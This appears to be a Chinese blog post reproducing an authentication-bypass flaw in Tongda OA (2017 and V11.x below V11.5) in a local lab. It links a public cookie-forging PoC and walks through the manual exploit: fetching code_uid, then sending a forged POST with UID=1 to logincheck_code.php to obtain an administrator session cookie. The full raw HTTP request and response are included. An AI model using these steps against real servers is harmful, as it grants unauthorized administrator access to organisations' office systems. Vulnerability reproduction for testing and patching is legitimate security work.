通达OA任意用户登陆漏洞复现

影响版本

通达OA 2017版

通达OA V11.X<V11.5

环境搭建

安装包来自黑白之道(https://mp.weixin.qq.com/s/moxuMnaqzXg-tZ7_2oLxbQ)

下载安装包后一键安装即可

链接:

https://pan.baidu.com/s/1eel1BxEc0XE4PqlA7y7-Tw

提取码:ilj1

安装过程很简单故不再赘述

漏洞复现

初始用户:admin 密码:空

访问localhost可以看到登陆页面

image-20200503100509520

说明我们环境已经ok了

我们可以先登陆进去,发现管理员后台地址都是如下格式

http://网站/general/index.php?isIE=0&modify_pwd=0

image-20200503100743939

我们可以看到我们直接访问这个网址会显示我们没有登陆

然后我们利用poc生成我们的cookie并进行替换

Poc地址:https://github.com/NS-Sp4ce/TongDaOA-Fake-User

通过poc生成我们的cookie

image-20200503101031070

来到我们之前的那个链接,打开F12进行cookie的替换

image-20200503101235681

替换完之后重新刷新一下

image-20200503101349450

可以看到我们成功的利用cookie登陆了进来

手动复现

访问 /general/login_code.php

image-20200503103036692

获取返回的code_uid 注意注意!!这里要把cookie删除掉不然是无法获得道Set-Cookie

Post 发包

CODEUID=上一个数据包的code_uid&UID=1

image-20200503103425990

数据包如下

POST /logincheck_code.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 104

Upgrade-Insecure-Requests: 1
Content-Length: 52

CODEUID={B33EE507-314D-EC90-6258-10D33F800BC9}&UID=1

返回包中的cookie

Set-Cookie: PHPSESSID=0ni6eptuu3595vlfan1aii61v4; path=/

点赞

发表评论

昵称和uid可以选填一个,填邮箱必填(留言回复后将会发邮件给你)
tips:输入uid可以快速获得你的昵称和头像